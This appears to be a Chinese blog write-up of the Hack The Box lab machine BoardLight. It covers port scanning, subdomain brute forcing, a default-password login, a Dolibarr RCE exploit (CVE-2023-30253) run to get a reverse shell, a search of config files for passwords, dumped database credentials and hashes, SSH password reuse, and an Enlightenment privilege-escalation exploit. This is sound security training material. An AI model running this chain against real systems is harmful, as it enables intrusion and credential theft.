HTB-BoardLight

metafa1ica
  2025-08-04 22:40:45 2025-08-04 22:40:45 创建   2025-08-17 14:28:18 2025-08-17 14:28:18 更新    
1
2
3
4
ip='10.129.254.182'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip
echo "$ip board.htb" | sudo tee -a /etc/hosts

开了22,80

image

vhost爆破

翻了一圈没辙,htb提示爆破子域名

1
ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://board.htb -H 'Host: FUZZ.board.htb' -fw 6243 -t 100

找到crm.board.htb

image

弱口令

弱口令admin/admin直接登进来了

image

CVE-2023-30253

Dolibarr<=17.0.0 有个RCE

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

1
python poc.py http://crm.board.htb admin admin 10.10.16.42 9001

image

权限有点低,得考虑提权了

提权

找下suid有这些东西

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

看下端口有3306

image

找下数据库账号密码

1
find / -regex ".*\.php" 2>/dev/null | xargs grep -E "=jdbc:|pass=|passwd=" 2>/dev/null

配置文件在/var/www/html/crm.board.htb/htdocs/conf/conf.php

image

1
2
3
4
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
1
2
mysql -u'dolibarrowner' -p'serverfun2$2023!!' -e 'SHOW TABLES FROM dolibarr;'
mysql -u'dolibarrowner' -p'serverfun2$2023!!' -e 'select * FROM dolibarr.llx_user;'

挑点数据

loginpass_cryptedapi_key
dolibarr$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCmNULL
admin$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96yr6V3pXd9QEI

看半天没用啊,结果是mysql密码登录ssh,htb老喜欢玩这个

1
ssh larissa@$ip

image

enlightenment

之前suid能看到enlightenment,问了下GPT这玩意有个提权洞

image

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

image

3e992b38b4d504af1d4243a401568db7

  • 标题: HTB-BoardLight
  • 作者: metafa1ica
  • 创建于 : 2025-08-04 22:40:45
  • 更新于 : 2025-08-17 14:28:18
  • 链接: https://metafa1ica.github.io/post/606d94a37d5d/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
HTB-BoardLight
  1. vhost爆破
  2. 弱口令
  3. CVE-2023-30253
  4. 提权
    1. enlightenment